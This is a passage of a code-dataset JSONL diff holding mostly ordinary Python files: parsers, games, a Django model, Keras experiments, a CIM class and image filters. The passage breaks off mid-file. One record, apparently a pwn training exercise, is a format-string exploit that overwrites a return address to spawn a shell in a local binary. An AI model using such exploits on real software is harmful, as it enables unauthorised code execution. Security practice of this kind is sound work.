diff --git "a/4450.jsonl" "b/4450.jsonl" new file mode 100644--- /dev/null +++ "b/4450.jsonl" @@ -0,0 +1,681 @@ +{"seq_id":"154717964","text":"import json\nfrom stream_parser.pubmed_row_parser import PubmedRowParser\n\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Processor:\n\n def parse_pubmed(self, json_str):\n \"\"\"\n curl --header \"Content-Type: application/json\" \\\n --request POST \\\n --data '{ \"path\": \"pubmed_baseline/pubmed19n0971.xml.gz\", \"limit\": 10 }' \\\n http://localhost:5000/parse_pubmed\n\n 1. read json, get obs path\n 2. use read_obs_line to read gz stream\n 3. parse stream to pubmed parser\n\n :return:\n \"\"\"\n\n self.pr_parser = PubmedRowParser()\n\n error_return = [\"[ERROR]json decode error\"]\n # decode json\n try:\n request = json.loads(json_str)\n except json.decoder.JSONDecodeError as e:\n logging.info(\"parsing: {}\".format(json_str))\n logging.info(\"ERROR: {}\".format(e))\n yield error_return\n return\n\n # get value from dict by key\n try:\n pubmed_path = request['path']\n # ak = request['ak']\n # sk = request['sk']\n except KeyError as e:\n logging.info(\"ERROR: key:{} not found\".format(e))\n yield error_return\n return\n\n #callback = request.get_json().get('callback')\n size_limit = request.get('limit', -1)\n\n try:\n pubmed_rows = self.pr_parser.parse(pubmed_path)\n except Exception as e:\n logging.info(\"ERROR: \\n{}: {}\".format(e.__class__, e))\n yield error_return\n return\n\n if size_limit > 0:\n for pubmed_row in pubmed_rows[:size_limit]:\n pubmed_row[\"raw_gz\"] = pubmed_path\n yield json.dumps(pubmed_row)\n else:\n for pubmed_row in pubmed_rows:\n pubmed_row[\"raw_gz\"] = pubmed_path\n yield json.dumps(pubmed_row)\n\n","sub_path":"stream_parser/request_processor.py","file_name":"request_processor.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89086134","text":"import getWinner\nimport getAuthors\nimport getComments\nimport dupeCmtCheck\nimport removeInvalids\nimport sys\nimport importlib.util\n\nif sys.version_info < (3, 5):\n x = input(\"Please use Python 3.5 or above. Enter Y to ignore. \").upper()\n if x != \"Y\":\n exit(1)\n\n\nif importlib.util.find_spec('praw') is None:\n x = input(\"The PRAW package is required but not installed.\\nPlease run 'pip install praw' in your terminal.\\nEnd..\")\n exit(2)\n\n\nwhile True:\n x = int(input(\"\\nHello!\\nWhat would you like to launch?\\n0. Exit\\n1. getComments\\n2. getAuthors\\n3. removeInvalids\\n4. getWinner\\n5. 
dupeCmtCheck\\n\\nOption: \"))\n\n parts = {\n 1: getComments,\n 2: getAuthors,\n 3: removeInvalids,\n 4: getWinner,\n 5: dupeCmtCheck,\n }\n\n if x == 0:\n print(\"Goodbye\")\n exit(0)\n\n parts.get(x).main()\n","sub_path":"2020 Feb~Oct Draws/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298790263","text":"\nfrom ezprint import *\nfrom ctypes import *\nimport random\nimport time\nimport os\n\n\npole = [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\nnotification = ''\nwidth = 50\ntitle = 'Tic Tac Toe'\n\nfield_strs = []\n\n\nclass COORD(Structure):\n\tpass\nCOORD._fields_ = [(\"X\", c_short), (\"Y\", c_short)]\ndef print_at(r, c, s):\n\th = windll.kernel32.GetStdHandle(-11)\n\twindll.kernel32.SetConsoleCursorPosition(h, COORD(c, r))\n\tc = s.encode(\"windows-1252\")\n\twindll.kernel32.WriteConsoleA(h, c_char_p(c), len(c), None, None)\n\n\ndef cls():\n\tos.system('cls')\n\n\ndef print_window():\n\tmake_pole()\n\tcls()\n\tfor s in field_strs:\n\t\tprint(s)\n\n\ndef make_pole():\n\tglobal field_strs\n\tfield_strs = []\n\n\totstup = (width - 13) // 2 - 1\n\n\tfield_strs.append('╔' + title + (width - len(title) - 2) * '═' + '╗')\n\tfield_strs.append('║' + otstup * ' ' + '╔═══╦═══╦═══╗' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '║ ' + pole[0] + ' ║ ' + pole[1] + ' ║ ' + pole[2] + ' ║ ' + (otstup) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '╠═══╬═══╬═══╣' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '║ ' + pole[3] + ' ║ ' + pole[4] + ' ║ ' + pole[5] + ' ║' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '╠═══╬═══╬═══╣'+ (otstup + 1) * ' ' + '║' )\n\tfield_strs.append('║' + otstup * ' ' + '║ ' + pole[6] + ' ║ ' + pole[7] + ' ║ ' + pole[8] + ' ║' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '╚═══╩═══╩═══╝' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + (width - 2) * ' ' + '║')\n\n\ndef check_pole():\n\tglobal notification\n\tif pole[2] == 'X' and pole[4] == 'X' and pole[6] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[2] == 'O' and pole[4] == 'O' and pole[6] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[0] == 'X' and pole[4] == 'X' and pole[8] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[0] == 'O' and pole[4] == 'O' and pole[8] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[0] == 'X' and pole[3] == 'X' and pole[6] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[0] == 'O' and pole[3] == 'O' and pole[6] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[1] == 'X' and pole[4] == 'X' and pole[7] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[1] == 'O' and pole[4] == 'O' and pole[7] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[2] == 'X' and pole[5] == 'X' and pole[8] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[2] == 'O' and pole[5] == 'O' and pole[8] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[0] == 'X' and pole[1] == 'X' and pole[2] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[0] == 'O' and pole[1] == 'O' and pole[2] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[3] == 'X' and pole[4] == 'X' and pole[5] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[3] == 'O' and pole[4] == 'O' and pole[5] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[6] == 'X' and pole[7] == 'X' and pole[8] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[6] == 'O' and pole[7] == 'O' and pole[8] == 'O':\n\t\tnotification = 'O WON!'\n\n\ndef 
main():\n\tglobal notification\n\n\t\n\twhile True:\n\t\tprint_window()\n\n\t\tif notification == 'This cell is not empty':\n\t\t\tprint('║ This cell is not empty ║')\n\t\telif notification == '':\n\t\t\tprint('║ ║')\n\t\telif notification == 'X WON!' or notification == 'O WON!':\n\t\t\tprint('║ ║')\n\t\t\tprint('║' + ' ' * 21 + notification + ' ' * 21 + '║')\n\t\t\tprint('║ ║')\n\t\t\tprint('╚════════════════════════════════════════════════╝')\n\t\t\ttime.sleep(1)\n\t\t\tmenu()\n\n\t\tprint('║ Input number of cell: ║')\n\n\t\tprint('║ ║')\n\t\tprint('╚════════════════════════════════════════════════╝')\n\t\tprint_at(10 ,36, '')\n\n\t\tnotification = ''\n\n\t\tk = int(input('')) - 1\n\n\t\tif pole[k] == ' ':\n\t\t\tpole[k] = 'X'\n\n\t\t\tfo = random.randrange(0, 8)\n\t\t\t\n\t\t\twhile pole[fo] != ' ':\n\t\t\t\tif pole[0] != ' ' and pole[1] != ' ' and pole[2] != ' ' and pole[3] != ' ' and pole[5] != ' ' and pole[6] != ' ' and pole[7] != ' ' and pole[8] != ' ':\n\t\t\t\t\tbreak\n\t\t\t\tfo = random.randrange(0, 8)\n\t\t\t\n\t\t\tpole[fo] = 'O'\n\t\t\tcheck_pole()\n\t\t\tprint_window()\n\t\telse:\n\t\t\tnotification = 'This cell is not empty'\n\n\ndef menu():\n\tos.system('@echo off')\n\tos.system('mode con:cols=' + str(width + 1) + ' lines=15')\n\tcls()\n\tp(pwi('===TIC-TAC-TOE==='))\n\tp(pwi('=====1-START====='))\n\tp(pwi('=====2-EXIT======'))\n\tvi = input(pwi('>>>'))\n\tif vi == '1':\n\t\tmain()\n\tif vi == '2':\n\t\texit()\n\nif __name__ == '__main__':\n\tmenu()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248815599","text":"# urlcaller.py\nimport logging\nimport sys\nimport requests\n\nlogger = logging.getLogger(__name__)\n\ntry:\n response = requests.get(sys.argv[1])\nexcept requests.exceptions.ConnectionError as e:\n logger.exception()\n print(-1, 'Connection Error')\nelse:\n print(response.status_code, response.content)\n","sub_path":"urlcaller.py","file_name":"urlcaller.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"376934968","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2018/12/14 15:38\n@author: Sucre\n@email: qian.dong.2018@gmail.com\n\"\"\"\n\n\nclass Solution:\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n s=\"abcdefghijklmnopqrstuvwxyz\"\n dtos = {}\n if digits==\"\":\n return []\n for i in range(5):\n dtos[i + 2] = s[i * 3:i * 3 + 3]\n dtos[7] = 'pqrs'\n dtos[8] = 'tuv'\n dtos[9] = 'wxyz'\n res = []\n for d in digits:\n res.append(dtos[int(d)])\n def dp(i):#res[i:]的组合\n result = []\n if i == len(res):\n return ['']\n chars = res[i]\n for c in chars:\n chars_next = dp(i+1)\n for cn in chars_next:\n result.append(c+cn)\n return result\n return dp(0)\n\n\n","sub_path":"_017_Letter_Combinations_of_a_Phone_Number.py","file_name":"_017_Letter_Combinations_of_a_Phone_Number.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"30722858","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Activation\nimport numpy as np\nimport random\nfrom math import ceil\nimport time\nimport sys\nimport keras\n\n#Dimension of layers\ndim = 8\n\n#Generate dataset\nX = []\nfor i in range(0,2**dim):\n n = [float(x) for x in bin(i)[2:]]\n X.append([0.]*(dim-len(n))+n)\ny = 
X[:]\nrandom.shuffle(y)\nX = np.array(X)\ny = np.array(y)\n\n# create model\nmodel = Sequential()\nmodel.add(Dense(dim, input_dim=dim, init='normal'))\nmodel.add(Activation('sigmoid'))\nmodel.add(Dense(dim, init='normal'))\nmodel.add(Activation('sigmoid'))\nmodel.add(Dense(dim, init='normal'))\nmodel.add(Activation('sigmoid'))\n\nstart_time = time.clock()\n# Compile model\nmodel.compile(loss='mse', optimizer='SGD', metrics=['accuracy'])\n# Fit the model\nmodel.fit(X, y, nb_epoch=1000, batch_size=50, verbose=1,\n callbacks= [\n#keras.callbacks.TerminateOnNaN()\n#keras.callbacks.EarlyStopping(monitor='loss', patience=1)\n#keras.callbacks.EarlyStopping(monitor='accuracy', patience=1)\nkeras.callbacks.DeepLocalize(X, y, len(model.layers), batch_size=50, startTime = start_time)\n]\n )\n# evaluate the model\nscores = model.evaluate(X, y)\nprint(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\noutput = model.predict(X)\nend_time = time.clock()\n\n\n#Make the output binary\nfor i in range(0, output[:,0].size):\n for j in range(0, output[0].size):\n if output[i][j] > 0.5 or output[i][j] == 0.5:\n output[i][j] = 1\n else:\n output[i][j] = 0\nprint(output)\nprint(\"Time\", (end_time -start_time))\nsys.exit(1)","sub_path":"Benchmark/StackOverflow/39217567/Buggy Code/39217567.py","file_name":"39217567.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310266054","text":"from django.db import models\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.auth.models import User\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Note(models.Model):\n title = models.CharField(verbose_name=_('Title'), max_length=32)\n body = models.TextField(verbose_name=_('Body'))\n creation_datetime = models.DateTimeField(verbose_name=_('Creation datetime'), auto_now_add=True)\n author = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n ordering = ['creation_datetime']\n\n\nclass NoteItem(models.Model):\n note = models.ForeignKey('Note', on_delete=models.CASCADE)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n def __str__(self):\n return self.note\n\n class Meta:\n ordering = ['-note']\n","sub_path":"ingredient_order_site/notes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"624224379","text":"# Copyright (C) 2010-2011 Richard Lincoln\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 
MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom CIM14.IEC61970.Core.EquipmentContainer import EquipmentContainer\n\nclass VoltageLevel(EquipmentContainer):\n \"\"\"A collection of equipment at one common system voltage forming a switchgear. The equipment typically consist of breakers, busbars, instrumentation, control, regulation and protection devices as well as assemblies of all these.\n \"\"\"\n\n def __init__(self, highVoltageLimit=0.0, lowVoltageLimit=0.0, Substation=None, MemberOf_Substation=None, Bays=None, BaseVoltage=None, *args, **kw_args):\n \"\"\"Initialises a new 'VoltageLevel' instance.\n\n @param highVoltageLimit: The bus bar's high voltage limit \n @param lowVoltageLimit: The bus bar's low voltage limit \n @param Substation: The association is used in the naming hierarchy.\n @param MemberOf_Substation: Alias for Substation\n @param Bays: The association is used in the naming hierarchy.\n @param BaseVoltage: The base voltage used for all equipment within the VoltageLevel.\n \"\"\"\n #: The bus bar's high voltage limit\n self.highVoltageLimit = highVoltageLimit\n\n #: The bus bar's low voltage limit\n self.lowVoltageLimit = lowVoltageLimit\n\n self._Substation = None\n self.Substation = Substation\n if MemberOf_Substation != None:\n self.Substation = MemberOf_Substation\n\n self._Bays = []\n self.Bays = [] if Bays is None else Bays\n\n self._BaseVoltage = None\n self.BaseVoltage = BaseVoltage\n\n super(VoltageLevel, self).__init__(*args, **kw_args)\n\n _attrs = [\"highVoltageLimit\", \"lowVoltageLimit\"]\n _attr_types = {\"highVoltageLimit\": float, \"lowVoltageLimit\": float}\n _defaults = {\"highVoltageLimit\": 0.0, \"lowVoltageLimit\": 0.0}\n _enums = {}\n _refs = [\"Substation\", \"MemberOf_Substation\", \"Bays\", \"BaseVoltage\"]\n _many_refs = [\"Bays\"]\n\n def getSubstation(self):\n \"\"\"The association is used in the naming hierarchy.\n \"\"\"\n return self._Substation\n\n def setSubstation(self, value):\n if self._Substation is not None:\n filtered = [x for x in self.Substation.VoltageLevels if x != self]\n self._Substation._VoltageLevels = filtered\n\n self._Substation = value\n if self._Substation is not None:\n if self not in self._Substation._VoltageLevels:\n self._Substation._VoltageLevels.append(self)\n\n Substation = property(getSubstation, setSubstation)\n MemberOf_Substation = property(getSubstation, setSubstation)\n\n def getBays(self):\n \"\"\"The association is used in the naming hierarchy.\n \"\"\"\n return self._Bays\n\n def setBays(self, value):\n for x in self._Bays:\n x.VoltageLevel = None\n for y in value:\n y._VoltageLevel = self\n self._Bays = value\n\n Bays = property(getBays, setBays)\n\n def addBays(self, *Bays):\n for obj in Bays:\n obj.VoltageLevel = self\n\n def removeBays(self, *Bays):\n for obj in Bays:\n obj.VoltageLevel = None\n\n def getBaseVoltage(self):\n \"\"\"The base voltage used for all equipment within the VoltageLevel.\n \"\"\"\n return self._BaseVoltage\n\n def setBaseVoltage(self, value):\n if self._BaseVoltage is not None:\n filtered = [x for x in self.BaseVoltage.VoltageLevel if x != self]\n self._BaseVoltage._VoltageLevel = filtered\n\n self._BaseVoltage = value\n if self._BaseVoltage is not None:\n if self not in 
self._BaseVoltage._VoltageLevel:\n self._BaseVoltage._VoltageLevel.append(self)\n\n BaseVoltage = property(getBaseVoltage, setBaseVoltage)\n\n","sub_path":"CIM14/IEC61970/Core/VoltageLevel.py","file_name":"VoltageLevel.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66834625","text":"#!/usr/bin/env python\r\n\r\nfrom pwn import *\r\nr = process(\"./formatstring\")\r\nraw_input('Debug?')\r\n\r\ndef bin_sh():\r\n\tsystem = 0xf7e3dda0 \r\n\tsystem_low = system & 0xffff\r\n\tsystem_high = (system & 0xffff0000) >> 16\r\n\r\n\tstring_bin_sh = 0xf7f5ea0b \r\n\tstring_bin_sh_low = string_bin_sh & 0xffff\r\n\tstring_bin_sh_high = (string_bin_sh & 0xffff0000) >> 16\r\n\r\n\tret_main = 0xffffd5dc\r\n\t\r\n\tpayload = p32(ret_main)\r\n\tpayload += p32(ret_main+2)\r\n\tpayload += p32(ret_main+8)\r\n\tpayload += p32(ret_main+10)\r\n\tpayload += \"%\" + str(system_low - 16) + \"x%6$hn\"\r\n\tpayload += \"%\" + str(0x10000 + system_high - system_low) + \"x%7$hn\"\r\n\tpayload += \"%\" + str(0x10000 + string_bin_sh_low - system_high)+ \"x%8$hn\"\r\n\tpayload += \"%\" + str(string_bin_sh_high - string_bin_sh_low)+ \"x%9$hn\"\r\n\t\r\n\treturn payload\r\n\r\n\r\nr.sendline(bin_sh())\r\nr.interactive()","sub_path":"pwntraining/format/formatstring.py","file_name":"formatstring.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"339826903","text":"# -*- coding: utf-8 -*-\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Conv2D, Dropout, Flatten, MaxPooling2D\r\nimport cv2 as cv\r\n\r\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\r\n\r\nx_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\r\nx_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\r\ninput_shape = (28, 28, 1)\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\n# Normalizing the RGB codes by dividing it to the max RGB value.\r\nx_train /= 255\r\nx_test /= 255\r\n\r\n\r\n#-----------------------------------------Training Starts-------------------------------------\r\n\r\nmodel = tf.keras.models.Sequential()#Feed foeward \r\nmodel.add(tf.keras.layers.Flatten())#input layer\r\nmodel.add(tf.keras.layers.Dense(128,activation = tf.nn.relu))#hidden\r\nmodel.add(tf.keras.layers.Dense(128,activation = tf.nn.relu))#hidden\r\nmodel.add(tf.keras.layers.Dense(10,activation = tf.nn.softmax))#Output classification for 10 digit \r\n\r\nmodel.compile(optimizer = 'adam',loss = 'sparse_categorical_crossentropy',metrics= ['accuracy'])\r\nmodel.fit(x_train,y_train, epochs = 3)\r\n\r\n#-----------------------------------------Training Ends-------------------------------------\r\n\r\nmodel.save('num_rec_model1.model')\r\nnew_model = tf.keras.models.load_model('C:/Users/NSahoo/.spyder-py3/num_rec_model1.model')\r\n\r\nfile = \"C:/Users/NSahoo/.spyder-py3/1.jpg\"\r\nnew_model.evaluate(x_test, y_test)\r\n\r\n\r\nimage = cv.imread(file, cv.IMREAD_GRAYSCALE)\r\nimage = cv.resize(image, (28, 28))\r\nimage = image.astype('float32')\r\nimage = image.reshape(1, 28, 28, 1)\r\nimage = 255-image\r\nimage /= 255\r\n\r\n\r\nplt.imshow(image.reshape(28, 28),cmap='Greys')\r\nplt.show()\r\npred = new_model.predict(image.reshape(1, 28, 28, 1), 
batch_size=1)\r\nprint(pred.argmax())","sub_path":"DigiRecog_Own_image_test.py","file_name":"DigiRecog_Own_image_test.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454284727","text":"# WARNING\n# THIS IS A SCRIPT DESIGNED To QUICKLY CLEAR ALL THE FILES IN THE MEDIA FOLDER\n# THIS FILE SHOULD NOT BE RELEASED IN THE FINAL BUILD OF THE WEBSITE\n\nimport os\nfrom os import walk\nfrom olivesProject.settings import MEDIA_DIR\n\n\ndef clear():\n\n for dirpath, subdirs, files in walk(MEDIA_DIR):\n for file in files:\n print(\"Deleting file: \" + os.path.join(dirpath, file))\n os.remove(os.path.join(dirpath, file))\n\n\nif __name__ == \"__main__\":\n confirm = input(\"WARNING THIS WILL CLEAR ALL FILES IN THE MEDIA DIR. ENTER y TO CONTINUE: \")\n if confirm == \"y\":\n print(\"CONFIRMATION ACKNOWLEDGED DELETING ALL MEDIA FILES !\")\n clear()\n","sub_path":"clear_media.py","file_name":"clear_media.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"75906761","text":"\nfrom operator import itemgetter\n\ncities = [\n ('Poznan', 500000), \n ('Berlin', 3200000), \n ('Heidelberg', 50000), \n ('London',9000000), \n ('Dublin', 506000), \n ('Warsaw', 1700000)\n ]\n \n \ndef print_cities(c):\n \"\"\"Prints cities nicely.\"\"\"\n for i, citydata in enumerate(c):\n name, population = citydata\n print(\"%3i. %-15s\\t%10i\"%(i+1, name, population))\n \n\nprint('\\nunsorted:')\nprint_cities(cities)\n\nprint('\\nsorted by name:')\ncities.sort()\nprint_cities(cities)\n\nprint('\\nsorted by population size:')\ncities = sorted(cities, key=itemgetter(1))\nprint_cities(cities)\n\n","sub_path":"example_programs/data_structures/sorting/sort_by_column.py","file_name":"sort_by_column.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"176710463","text":"import pandas, numpy\r\nfrom scipy import spatial\r\nfrom utils import mongoUtils, configReader, dimentionalityUtils\r\n\r\nclass allVDLocations:\r\n def __init__(self, method, location_id, latent_semantics):\r\n '''\r\n Constructor method for the class\r\n :param method: Method for demensionality reductions\r\n :param location_id: Query location ID\r\n '''\r\n self.method = method\r\n self.location_id = location_id\r\n self.latent_semantics = latent_semantics\r\n\r\n def getLocationName(self):\r\n '''\r\n Returns location name respective to entered location ID\r\n :return:\r\n Location name\r\n '''\r\n config = configReader()\r\n mu = mongoUtils(config.mongo_hostname, config.mongo_database,\r\n config.location_info_collection)\r\n client = mu.get_mongodb_client()\r\n collection = mu.get_mongodb_collection(client)\r\n location_name = collection.distinct(\"title\",\r\n {\"number\": int(self.location_id)})\r\n client.close()\r\n return location_name[0]\r\n\r\n def getLocationList(self):\r\n config = configReader()\r\n mu = mongoUtils(config.mongo_hostname, config.mongo_database,\r\n config.location_vd_collection)\r\n client = mu.get_mongodb_client()\r\n collection = mu.get_mongodb_collection(client)\r\n results = collection.aggregate([{\"$match\": {}},\r\n {\"$project\": {\r\n \"location\": \"$location\",\r\n }}])\r\n data = pandas.DataFrame(list(results))\r\n return data['location']\r\n\r\n\r\n def getDataFrame(self, image, image_score):\r\n '''\r\n Returns pandas dataframe for 
images and their visual discriptor model\r\n :param image: List of Image IDs\r\n :param image_score: List of visual descriptor score\r\n :return:\r\n Pandas dataframe\r\n '''\r\n image_score = numpy.array(image_score).reshape(len(image_score),\r\n len(image_score[0]))\r\n return pandas.DataFrame(image_score, columns=range(len(image_score[0])),\r\n index=image)\r\n\r\n def getQueryLocationData(self, location_name, vector_model):\r\n '''\r\n Get visual descriptor data for given location\r\n :return:\r\n Matrix of image scores for selected visual model of given location\r\n '''\r\n config = configReader()\r\n mu = mongoUtils(config.mongo_hostname, config.mongo_database,\r\n config.location_vd_collection)\r\n client = mu.get_mongodb_client()\r\n collection = mu.get_mongodb_collection(client)\r\n result = collection.aggregate([{\"$match\": {\"location\": location_name}},\r\n {\"$project\": {\r\n \"_id\": \"$_id\",\r\n \"location\": \"$location\",\r\n \"images\": \"$\" + vector_model + \".image\",\r\n \"scores\": \"$\" + vector_model + \".scores\"\r\n }}])\r\n data = pandas.DataFrame(list(result))\r\n client.close()\r\n query_image_list = data['images']\r\n query_scores_list = data['scores']\r\n image_score_matrix = pandas.DataFrame()\r\n for index in range(len(query_image_list)):\r\n image_score_matrix = image_score_matrix.append(\r\n self.getDataFrame(query_image_list[index], query_scores_list[index]))\r\n return image_score_matrix, query_image_list\r\n\r\n def getSimilarLocations(self):\r\n model_similarity = {}\r\n cos_location = []\r\n store = {}\r\n mat = {}\r\n location_name = self.getLocationName()\r\n model = ['CM', 'CN', 'CM3x3', 'CN3x3', 'CSD', 'GLRLM', 'GLRLM3x3', 'HOG', 'LBP', 'LBP3x3']\r\n all_location_list = self.getLocationList()\r\n for i in model:\r\n image_score_matrix, query_image_list = self.getQueryLocationData(location_name, i)\r\n du = dimentionalityUtils(self.method, image_score_matrix, self.latent_semantics)\r\n u, s, vt = du.apply_transformation()\r\n new_feature_mat = image_score_matrix.dot(vt.T)\r\n for n in range(len(vt)):\r\n print(\"\\nLatent Semantics\", n + 1, \"using Choice\", self.method, \"for Model\", i, \"are: \",\r\n end=\":\") # Displaying the Latent Semantics of Query location\r\n for score_index in range(len(vt[n])):\r\n if score_index == len(vt[n]) - 1:\r\n print(vt[n][score_index])\r\n else:\r\n print(vt[n][score_index], end=',')\r\n print()\r\n store[i] = vt\r\n mat[i] = new_feature_mat # Storing the new feature matrix and all models score for further computation\r\n for r in range(len(all_location_list)):\r\n for i in model:\r\n other_image_score_matrix, image_list = self.getQueryLocationData(all_location_list[r], i)\r\n related_location_scores = numpy.matmul(other_image_score_matrix, numpy.transpose(\r\n store[i])) # generating Images of the location x Latent Semantics matrix\r\n location_scores_df = pandas.DataFrame(related_location_scores, index=other_image_score_matrix.axes[0])\r\n location_scores_df = location_scores_df[~location_scores_df.index.duplicated(keep='first')]\r\n cos = []\r\n mat[i]\r\n for e in image_list[0]:\r\n current_image = list(location_scores_df.loc[e].values)\r\n for j in mat[i].values:\r\n cos.append(spatial.distance.euclidean(current_image, j.tolist())) # Euclidean Distance Calculation\r\n cos_location.append(numpy.mean(cos))\r\n model_similarity[all_location_list[r]] = numpy.mean(cos_location)\r\n count = 0\r\n print(\"Most similar 5 locations are:\")\r\n for location in sorted(model_similarity, 
key=model_similarity.get):\r\n print(\"Location\", location, \"with similarity score\",\r\n model_similarity[location])\r\n count += 1\r\n if count == 5:\r\n break\r\n","sub_path":"Phase 2/allVDLocations.py","file_name":"allVDLocations.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"46130927","text":"import numpy as np\r\nimport random\r\nimport cv2\r\nimport math\r\n\r\n#-----------------------------------------------------------\r\n#Funcion para ruido de sal y pimienta\r\ndef sp_noise(image,prob):\r\n '''\r\n Add salt and pepper noise to image\r\n prob: Probability of the noise\r\n '''\r\n\r\n output = np.zeros(image.shape,np.uint8)\r\n thres = 1 - prob\r\n for i in range(image.shape[0]):\r\n for j in range(image.shape[1]):\r\n rdn = random.random()\r\n if rdn < prob:\r\n output[i][j] = 0\r\n elif rdn > thres:\r\n output[i][j] = 255\r\n else:\r\n output[i][j] = image[i][j]\r\n return output\r\n#Funcion para generar ruido gaussiano\r\ndef gauss_noise(image):\r\n noisy_image = np.zeros(image.shape,np.uint8)\r\n row = image.shape[0]\r\n col = image.shape[1]\r\n gaussian_noise = np.zeros((row,col),dtype=np.uint8)\r\n noiseg = cv2.randn(gaussian_noise, 100, 150)\r\n gaussian = (noiseg*0.5).astype(np.uint8)\r\n noisy_image = cv2.add(image,gaussian)\r\n return noisy_image\r\n\r\n#-----------------------------------------------------------------\r\n#Funciones: Filtro para imagen con ruido de sal y pimienta\r\n\r\ndef fill_kernel(kernel_mid_x, kernel_mid_y, kernel_size, image):\r\n\r\n kernel = np.zeros((kernel_size[0], kernel_size[1]), dtype = int)\r\n from_x = kernel_mid_x - int(math.floor(kernel_size[1]/2))\r\n to_x = kernel_mid_x + int(math.floor(kernel_size[1]/2))\r\n from_y = kernel_mid_y - int(math.floor(kernel_size[0]/2))\r\n to_y = kernel_mid_y + int(math.floor(kernel_size[0]/2))\r\n\r\n for i in range(from_x, to_x + 1):\r\n for j in range(from_y, to_y + 